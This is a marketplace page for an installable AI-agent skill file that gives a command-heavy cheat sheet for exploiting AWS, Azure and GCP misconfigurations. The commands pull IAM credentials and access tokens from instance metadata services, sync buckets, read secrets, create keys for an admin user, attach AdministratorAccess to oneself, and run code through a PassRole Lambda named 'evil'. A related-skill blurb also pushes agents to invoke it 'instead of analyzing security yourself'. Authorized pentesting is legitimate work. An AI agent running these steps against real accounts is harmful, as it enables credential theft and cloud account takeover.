0X6C7879/cloud-security
skills/cloud-security/SKILL.md
Exploit AWS, Azure, and GCP cloud misconfigurations including S3 buckets, IAM roles, metadata services, serverless functions, and cloud-specific privilege escalation. Use when pentesting cloud environments or assessing cloud security.
$ install --global
skillsauthnpx skillsauth add 0X6C7879/aegissec cloud-securityInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 22, 2026, 4:41 AM135.8s1 file scanned
SKILL.md
- name:
- cloud-security
- description:
- Exploit AWS, Azure, and GCP cloud misconfigurations including S3 buckets, IAM roles, metadata services, serverless functions, and cloud-specific privilege escalation. Use when pentesting cloud environments or assessing cloud security.
Exploiting Cloud Platforms
When to Use
- AWS, Azure, or GCP security assessment
- Cloud misconfiguration exploitation
- S3/Blob/Storage bucket hunting
- Cloud IAM privilege escalation
- Serverless function exploitation
- Cloud metadata service abuse
AWS Security
AWS CLI Setup
# Configure credentials
aws configure
# Or export directly
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_DEFAULT_REGION=us-east-1
# Test credentials
aws sts get-caller-identity
# List available regions
aws ec2 describe-regions
S3 Bucket Enumeration
# List buckets
aws s3 ls
# List bucket contents
aws s3 ls s3://bucket-name/
aws s3 ls s3://bucket-name/ --recursive
# Download bucket contents
aws s3 sync s3://bucket-name/ ./local-folder/
# Check public access
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name
# Test unauthenticated access
aws s3 ls s3://bucket-name/ --no-sign-request
curl https://bucket-name.s3.amazonaws.com/
S3 Bucket Discovery:
# Common naming patterns
company-backup
company-data
company-dev
company-prod
company-logs
company-assets
# Tools
# s3scanner
python3 s3scanner.py buckets.txt
# S3 Inspector
python3 s3inspector.py --bucket-file buckets.txt
IAM Enumeration
# Current user info
aws sts get-caller-identity
# List IAM users (if allowed)
aws iam list-users
# List user policies
aws iam list-attached-user-policies --user-name username
aws iam list-user-policies --user-name username
# Get policy details
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/PolicyName
aws iam get-policy-version --policy-arn arn --version-id v1
# List roles
aws iam list-roles
# List groups
aws iam list-groups
EC2 Enumeration
# List instances
aws ec2 describe-instances
# Get instance metadata (from instance)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
# List security groups
aws ec2 describe-security-groups
# List key pairs
aws ec2 describe-key-pairs
# List snapshots
aws ec2 describe-snapshots --owner-ids self
# Public snapshots by account
aws ec2 describe-snapshots --owner-ids 123456789012 --restorable-by-user-ids all
Lambda Functions
# List functions
aws lambda list-functions
# Get function code
aws lambda get-function --function-name function-name
# Invoke function
aws lambda invoke --function-name function-name output.txt
# Get function configuration
aws lambda get-function-configuration --function-name function-name
RDS Enumeration
# List DB instances
aws rds describe-db-instances
# List DB snapshots
aws rds describe-db-snapshots
# Check if publicly accessible
aws rds describe-db-instances --query 'DBInstances[*].[DBInstanceIdentifier,PubliclyAccessible]'
Secrets Manager
# List secrets
aws secretsmanager list-secrets
# Get secret value
aws secretsmanager get-secret-value --secret-id secret-name
CloudTrail (Logging)
# Check if CloudTrail is enabled
aws cloudtrail describe-trails
# Check trail status
aws cloudtrail get-trail-status --name trail-name
# Get recent events
aws cloudtrail lookup-events
AWS Privilege Escalation
Common Misconfigurations:
# iam:CreatePolicyVersion - modify existing policies
# iam:SetDefaultPolicyVersion - set older policy version
# iam:PassRole + lambda:CreateFunction - execute code as role
# iam:AttachUserPolicy - attach admin policy to self
# iam:PutUserPolicy - add inline policy to self
# iam:CreateAccessKey - create keys for other users
# iam:UpdateAssumeRolePolicy - modify trust relationships
Exploitation Examples:
# Create access key for admin user (if iam:CreateAccessKey)
aws iam create-access-key --user-name admin-user
# Attach admin policy (if iam:AttachUserPolicy)
aws iam attach-user-policy --user-name current-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# PassRole + Lambda
aws lambda create-function --function-name evil --runtime python3.9 --role arn:aws:iam::ACCOUNT:role/AdminRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name evil output.txt
Azure Security
Azure CLI Setup
# Login
az login
# Login with service principal
az login --service-principal -u APP_ID -p PASSWORD --tenant TENANT_ID
# Get current account
az account show
# List subscriptions
az account list
Blob Storage Enumeration
# List storage accounts
az storage account list
# List containers
az storage container list --account-name accountname
# List blobs
az storage blob list --container-name containername --account-name accountname
# Download blob
az storage blob download --container-name containername --name filename --account-name accountname
# Check public access
az storage container show --name containername --account-name accountname
# Test unauthenticated access
curl https://accountname.blob.core.windows.net/container/file
Blob Discovery:
# Common patterns
companyname
companyname-backup
companyname-data
companyname-files
# MicroBurst (PowerShell)
Invoke-EnumerateAzureBlobs -Base company
VM Enumeration
# List VMs
az vm list
# List VM images
az vm image list
# Get VM details
az vm show --resource-group RG --name VMname
# List NICs
az network nic list
# List public IPs
az network public-ip list
Azure AD Enumeration
# List users
az ad user list
# Get current user
az ad signed-in-user show
# List groups
az ad group list
# List service principals
az ad sp list
# List applications
az ad app list
Function Apps
# List function apps
az functionapp list
# Get function app details
az functionapp show --name functionappname --resource-group RG
# List functions
az functionapp function list --name functionappname --resource-group RG
# Download function code
az functionapp deployment source config-zip --name functionappname --resource-group RG
Key Vault
# List key vaults
az keyvault list
# List secrets
az keyvault secret list --vault-name vaultname
# Get secret
az keyvault secret show --name secretname --vault-name vaultname
Azure Metadata Service
# From Azure VM
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# Get access token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
GCP Security
gcloud Setup
# Login
gcloud auth login
# Login with service account
gcloud auth activate-service-account --key-file=key.json
# Get current account
gcloud config list
# List projects
gcloud projects list
Storage Bucket Enumeration
# List buckets
gsutil ls
# List bucket contents
gsutil ls gs://bucket-name/
# Download files
gsutil cp gs://bucket-name/file.txt ./
# Check bucket permissions
gsutil iam get gs://bucket-name/
# Test unauthenticated access
curl https://storage.googleapis.com/bucket-name/file.txt
Bucket Discovery:
# Common patterns
company-backup
company-data
company_backup
company_data
# GCPBucketBrute
python3 gcpbucketbrute.py -k company
Compute Engine
# List instances
gcloud compute instances list
# Get instance details
gcloud compute instances describe instance-name --zone=zone
# List disks
gcloud compute disks list
# List snapshots
gcloud compute snapshots list
# List firewall rules
gcloud compute firewall-rules list
IAM Enumeration
# List service accounts
gcloud iam service-accounts list
# Get IAM policy
gcloud projects get-iam-policy PROJECT_ID
# List roles
gcloud iam roles list
# Describe role
gcloud iam roles describe roles/editor
Cloud Functions
# List functions
gcloud functions list
# Describe function
gcloud functions describe function-name --region=region
# Download source code (if accessible)
gcloud functions describe function-name --region=region --format="value(sourceArchiveUrl)"
GCP Metadata Service
# From GCP VM
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"
# Get access token
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
# Get service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" -H "Metadata-Flavor: Google"
Cloud Exploitation Tools
AWS:
# Pacu - AWS exploitation framework
python3 pacu.py
# ScoutSuite - Security auditing
python3 scout.py aws
# Prowler - Security assessment
./prowler -M csv
# WeirdAAL - AWS attack library
python3 weirdAAL.py
Azure:
# MicroBurst - PowerShell toolkit
Import-Module MicroBurst.psm1
Invoke-EnumerateAzureBlobs
Invoke-EnumerateAzureSubDomains
# ScoutSuite
python3 scout.py azure
# ROADtools - Azure AD
roadrecon auth
roadrecon gather
roadrecon gui
GCP:
# ScoutSuite
python3 scout.py gcp
# GCP-IAM-Privilege-Escalation
# Check for privilege escalation paths
Quick Cloud Wins
AWS:
- Public S3 buckets with sensitive data
- Overly permissive IAM policies
- Unencrypted snapshots
- Public RDS instances
- Lambda functions with secrets in environment variables
- EC2 metadata service abuse (SSRF)
Azure:
- Public blob storage containers
- Overly permissive RBAC
- Exposed Key Vault secrets
- Public-facing VMs with weak credentials
- Function apps with hardcoded secrets
GCP:
- Public storage buckets
- Overly permissive IAM bindings
- Public compute instances
- Service account key exposure
- Cloud Functions with secrets in code
Common Cloud Misconfigurations
- Public Storage - S3/Blob/GCS buckets with public read/write
- Excessive Permissions - Overly permissive IAM/RBAC policies
- Exposed Secrets - Keys/passwords in code, environment variables
- No MFA - Critical accounts without multi-factor authentication
- Open Security Groups - 0.0.0.0/0 access on sensitive ports
- Unencrypted Data - Storage/databases without encryption
- Default Credentials - Services using default passwords
- Exposed Metadata - SSRF to cloud metadata services
- Public Snapshots - EBS/disk snapshots publicly accessible
- CloudTrail Disabled - No logging of API calls
References
- https://book.hacktricks.xyz/pentesting-web/buckets
- https://github.com/RhinoSecurityLabs/pacu
- https://github.com/NetSPI/MicroBurst
- https://github.com/nccgroup/ScoutSuite
- https://cloudsecdocs.com/
Related Skills
0X6C7879/wooyun-legacy
development
VerifiedTrustedCommunity
WooYun-derived business-logic testing methodology for web apps and APIs. Use when the request involves 支付、退款、订单、越权、认证、授权、价格篡改或业务流程绕过 review, especially black-box probing for price tampering, account takeover, and process bypass flaws.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/windows-privilege-escalation
tools
VerifiedTrustedCommunity
Escalate privileges on Windows systems using service misconfigurations, DLL hijacking, token manipulation, UAC bypasses, registry exploits, and credential dumping. Use when performing Windows post-exploitation or privilege escalation.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/tunnel
development
VerifiedTrustedCommunity
Use when performing AD pentest tunneling and pivoting, especially with Ligolo-ng, Chisel, frp, proxychains, SSH forwarding, SOCKS relays, reverse tunnels, or when internal reachability is the main blocker.
2SKILL.mdUpdated Apr 28, 2026
0X6C7879/threat-modeling
development
VerifiedTrustedCommunity
Threat model, security audit, find vulnerabilities, check security of my app, risk assessment, penetration test prep, analyze attack surface, what could an attacker exploit. Use this skill whenever a user wants holistic security analysis of a codebase, application, or project. MUST be invoked instead of analyzing security yourself — it runs a specialized 8-phase STRIDE workflow producing professional deliverables you cannot generate alone: risk assessment reports, DFD diagrams, threat inventories, attack path validation, mitigation plans, and pentest plans. Trigger on: 威胁建模, 安全评估, 渗透测试, 安全分析, 安全审计, 安全检查, 风险评估. NOT for: fixing one specific bug, adding one security feature (rate limiting, CORS), writing tests, CI/CD setup, or debugging errors.
2SKILL.mdUpdated Apr 22, 2026